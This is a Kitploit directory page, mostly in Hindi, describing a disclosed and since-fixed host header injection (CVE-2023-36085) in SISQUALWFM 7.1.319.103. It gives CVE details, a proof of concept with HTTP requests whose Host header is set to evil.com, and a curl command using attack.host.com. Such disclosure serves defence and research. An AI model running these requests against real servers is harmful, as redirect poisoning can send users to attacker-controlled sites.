Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above. | Kitploit
उपकरण/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-36085 SISQUALWFM होस्ट हेडर इंजेक्शन भेद्यता

यह रिपॉजिटरी SISQUALWFM संस्करण 7.1.319.103 में खोजी गई होस्ट हेडर इंजेक्शन भेद्यता से संबंधित जानकारी प्रदान करती है, जो हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी दुर्भावनापूर्ण साइट पर रीडायरेक्ट करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 निर्दिष्ट किया गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक कर दिया गया है।

भेद्यता विवरण

  • एक्सप्लॉइट शीर्षक: SISQUALWFM 7.1.319.103 होस्ट हेडर इंजेक्शन
  • खोज की तिथि: 17/03/2023
  • रिपोर्ट की तिथि: 17/03/2023
  • समाधान की तिथि: 13/10/2023
  • एक्सप्लॉइट लेखक: Omer Shaik (unknown_exploit)
  • विक्रेता होमपेज: SISQUALWFM
  • संस्करण: 7.1.319.103
  • परीक्षण किया गया: SISQUAL WFM 7.1.319.103
  • प्रभावित संस्करण: SISQUALWFM 7.1.319.103
  • ठीक किया गया संस्करण: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • CVSS स्कोर: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • श्रेणी: वेब एप्लिकेशन

प्रमाण की अवधारणा

हम एक प्रूफ-ऑफ-कॉन्सेप्ट परिदृश्य प्रदान करते हैं जो होस्ट हेडर इंजेक्शन भेद्यता का प्रदर्शन करता है, विशेष रूप से /sisqualIdentityServer/core एंडपॉइंट को लक्षित करता है। यह भेद्यता हमलावर को होस्ट हेडर के साथ छेड़छाड़ करके वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी अन्य साइट पर रीडायरेक्ट करने की अनुमति देती है।

मूल अनुरोध

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

मूल प्रतिक्रिया

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

इंटरसेप्ट किया गया अनुरोध (evil.com पर रीडायरेक्ट करने के लिए संशोधित)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

प्रतिक्रिया

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Exploit Execution

हमला करने की विधि

इस भेद्यता का शोषण करने के लिए, एक हमलावर होस्ट हेडर को संशोधित करने के लिए निम्नलिखित curl कमांड का उपयोग कर सकता है:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

अस्वीकरण

यह रिपॉजिटरी केवल सूचनात्मक उद्देश्यों के लिए है और इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए। भेद्यता को जिम्मेदारीपूर्वक विक्रेता को सूचित किया गया है, और समस्या का समाधान कर दिया गया है। भेद्यताओं की पहचान और रिपोर्ट करते समय नैतिक हैकिंग दिशानिर्देशों का पालन करना और जिम्मेदार प्रकटीकरण प्रथाओं का सम्मान करना महत्वपूर्ण है।

टूल डाउनलोड करें